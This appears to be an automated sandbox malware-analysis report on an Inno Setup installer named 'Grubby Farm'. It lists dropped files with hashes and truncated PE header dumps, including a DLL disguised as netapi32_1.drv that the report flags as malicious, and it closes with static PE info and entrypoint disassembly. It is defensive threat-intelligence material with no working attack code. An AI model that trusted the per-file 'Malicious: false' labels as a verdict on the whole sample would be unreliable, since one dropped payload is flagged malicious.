SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxb5ntlk.3qh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbrupa20.asz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxrj23vh.lag.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkrtapzb.xxl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unmo1iow.iuz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xghx2uqo.hca.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrjitvkx.dwz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlfmmjfe.n0x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.745960477552938
Encrypted:	false
SSDEEP:	384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
MD5:	A813D18268AFFD4763DDE940246DC7E5
SHA1:	C7366E1FD925C17CC6068001BD38EAEF5B42852F
SHA-256:	E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
SHA-512:	B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: 1944b321.msi, Detection: malicious, Browse Filename: Xzm9fAfKhB.exe, Detection: malicious, Browse Filename: L9rm7AX4mp.exe, Detection: malicious, Browse Filename: AX3-GUI-45.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: fe61hqe0Dt.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: AX3-GUI-45.exe, Detection: malicious, Browse Filename: qgdf1HLJno.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EVB2V.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.745960477552938
Encrypted:	false
SSDEEP:	384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
MD5:	A813D18268AFFD4763DDE940246DC7E5
SHA1:	C7366E1FD925C17CC6068001BD38EAEF5B42852F
SHA-256:	E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
SHA-512:	B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-GLDSV.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp

Download File

Process:	C:\Users\user\Desktop\8n26gvrXUM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1181184
Entropy (8bit):	6.401110768123626
Encrypted:	false
SSDEEP:	24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
MD5:	BCC236A3921E1388596A42B05686FF5E
SHA1:	43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
SHA-256:	43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
SHA-512:	E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp

Download File

Process:	C:\Users\user\Desktop\8n26gvrXUM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1181184
Entropy (8bit):	6.401110768123626
Encrypted:	false
SSDEEP:	24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
MD5:	BCC236A3921E1388596A42B05686FF5E
SHA1:	43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
SHA-256:	43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
SHA-512:	E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\is-O7IBF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1203559
Entropy (8bit):	6.373854032166884
Encrypted:	false
SSDEEP:	24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx941:yGUhni7iSFCQ9e
MD5:	A6A8A9EA416599646B0F6C603068D2D3
SHA1:	689AAD3A2A42F749E0C173A2F9E6E3751F7178BE
SHA-256:	20E6E5672C89CA84CAA6A060F97CDBAF4B042AC21AFCD2524C5FD120E7844164
SHA-512:	93BF69A80833B176190EDDD926B34AD466A5A1EE7893BFEBB9E2179C42ACA1BB3C36DBB98DE509B2DEC1F97AFFA2862BF9CA8A797D487AA4443EB5CDAF1C2236
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	InnoSetup Log Grubby Farm, version 0x418, 3565 bytes, 065367\37\user\, C:\Users\user\AppData\Local\376\377\37
Category:	dropped
Size (bytes):	3565
Entropy (8bit):	3.7883420638542544
Encrypted:	false
SSDEEP:	96:pF/42pYFZn3JCdfc1AGlEDA4MZAe2L3xHh4G4:pFTqFZ30f7fDSmBH+G4
MD5:	316C835B5F022625F72E52F43D038662
SHA1:	2A6D959F80CA2D974C7F5123E737B2404D82E6EB
SHA-256:	FD690A6FE50EB0E18B4A61273424817C8E1B56D5F4D07FE006474D3FA6320EE3
SHA-512:	7F3102D37927E4A2980A393716BCB517C4BB88E5CE45B1F9EE87FBB0B90ADC00F84433B83DD0A045D8FACDE102C1CB12F84F8757FE948535686565EEFDC43BBF
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................Grubby Farm.....................................................................................................................Grubby Farm.................................................................................................................................%...............................................................................................................R.#(!........"Oz...............0.6.5.3.6.7......e.n.g.i.n.e.e.r......C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l................6...].. .....T....b...IFPS...............................................................................................................................................................BOOLEAN..............TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCurrentProcess.......(...dll:kernel32.dll.TerminateProcess............y... ...RESTARTINSTALLERWITHSILENTPARAMS....-1..EXPANDCONSTANT........E

C:\Users\user\AppData\Local\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1203559
Entropy (8bit):	6.373854032166884
Encrypted:	false
SSDEEP:	24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx941:yGUhni7iSFCQ9e
MD5:	A6A8A9EA416599646B0F6C603068D2D3
SHA1:	689AAD3A2A42F749E0C173A2F9E6E3751F7178BE
SHA-256:	20E6E5672C89CA84CAA6A060F97CDBAF4B042AC21AFCD2524C5FD120E7844164
SHA-512:	93BF69A80833B176190EDDD926B34AD466A5A1EE7893BFEBB9E2179C42ACA1BB3C36DBB98DE509B2DEC1F97AFFA2862BF9CA8A797D487AA4443EB5CDAF1C2236
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Roaming\is-66O79.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1745567
Entropy (8bit):	7.095269474684338
Encrypted:	false
SSDEEP:	49152:0OlRYeHGFRTIKJTPtpR2sVRcr4kO/B8nLj1yucyUeR37:0OlRYeHGFRkK7JuawLjj6eR37
MD5:	C6A93561FA2B6AF08724AE1CA16AF71C
SHA1:	1C2DD7373C544B1C8CF6EAB0CA2E17D41AE62363
SHA-256:	8FA95C6F3629180087E4BD86D10F55AEC2AE3FE07A780AF7B8EDF23A39A2872D
SHA-512:	A50B3ACC0415B61CC39E2FC12311EE6B9B539D5AF0A828C73CA422875D1A96EC13B719C702B29C3F8915DAA958DE2A9FDDD20FE3D6D4E0A36F665EF872353FB9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ZH.n........&"...+.4...j...... ................................................U....`... .........................................q....................@...g...h...9...... ........................... 5..(...................`... ............................text....3.......4..................`..`.data...`....P.......8..............@....rdata.......`.......<..............@..@.pdata...g...@...h..................@..@.xdata..............\|..............@..@.bss....@....p...........................edata..q............8..............@..@.idata........... ...:..............@....CRT....`............Z..............@....tls.................\..............@....reloc.. ............^..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1745567
Entropy (8bit):	7.095269474684338
Encrypted:	false
SSDEEP:	49152:0OlRYeHGFRTIKJTPtpR2sVRcr4kO/B8nLj1yucyUeR37:0OlRYeHGFRkK7JuawLjj6eR37
MD5:	C6A93561FA2B6AF08724AE1CA16AF71C
SHA1:	1C2DD7373C544B1C8CF6EAB0CA2E17D41AE62363
SHA-256:	8FA95C6F3629180087E4BD86D10F55AEC2AE3FE07A780AF7B8EDF23A39A2872D
SHA-512:	A50B3ACC0415B61CC39E2FC12311EE6B9B539D5AF0A828C73CA422875D1A96EC13B719C702B29C3F8915DAA958DE2A9FDDD20FE3D6D4E0A36F665EF872353FB9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ZH.n........&"...+.4...j...... ................................................U....`... .........................................q....................@...g...h...9...... ........................... 5..(...................`... ............................text....3.......4..................`..`.data...`....P.......8..............@....rdata.......`.......<..............@..@.pdata...g...@...h..................@..@.xdata..............\|..............@..@.bss....@....p...........................edata..q............8..............@..@.idata........... ...:..............@....CRT....`............Z..............@....tls.................\..............@....reloc.. ............^..............@..B........................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.932606554344445
TrID:	Win32 Executable (generic) a (10002005/4) 98.86% Inno Setup installer (109748/4) 1.08% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	8n26gvrXUM.exe
File size:	1'479'422 bytes
MD5:	c6f9f0ec394a72fb302efbcf74da2ea7
SHA1:	143c8fe025fbfd0afe9c88003315bc5a4720439a
SHA256:	0a63068ec9d94fef476d9e906fb4920de32e70b77daa24a8b2a0786f23889a1a
SHA512:	0ae6cce0267432ea2a6f44a40d9171238ee8c2025934e2b5a46d7cc7c4ffaefda483440f0cef7d1502c7e74124116565b11dbb1f14a6b6b02313ac45d3b64a45
SSDEEP:	24576:QMjhJ3I+qWJFFjV96zSzjq7z16g/RMcdGoKmS896ORyAt05bmktUNudtJjdPrF:jnwuVnFzjql6t5ofSs60tab7SNudXjdZ
TLSH:	2C652302B3C34871F8690A349C62C550EE17BD681DF6601B6EB9FE0E8DF92C25C7DA64
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	29226ee6b692c62f

Static PE Info

General

Entrypoint:	0x416478
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x457CA289 [Mon Dec 11 00:12:57 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	483f0c4259a9148c34961abbda6146c1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004152B8h
call 00007FA458D70C91h
xor eax, eax
push ebp
push 00416B45h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00416B01h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0041AB48h]
call 00007FA458D7F53Bh
call 00007FA458D7F0E2h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007FA458D78D64h
mov edx, dword ptr [ebp-14h]
mov eax, 0041D6E8h
call 00007FA458D6F2C7h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0041D6E8h]
mov dl, 01h
mov eax, dword ptr [0040F080h]
call 00007FA458D7964Fh
mov dword ptr [0041D6ECh], eax
xor edx, edx
push ebp
push 00416AADh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007FA458D7F5C3h
mov dword ptr [0041D6F4h], eax
mov eax, dword ptr [0041D6F4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007FA458D8092Ah
mov eax, dword ptr [0041D6F4h]
mov edx, 00000028h
call 00007FA458D79B18h
mov edx, dword ptr [0041D6F4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e000	0xf9e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x21000	0x102d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
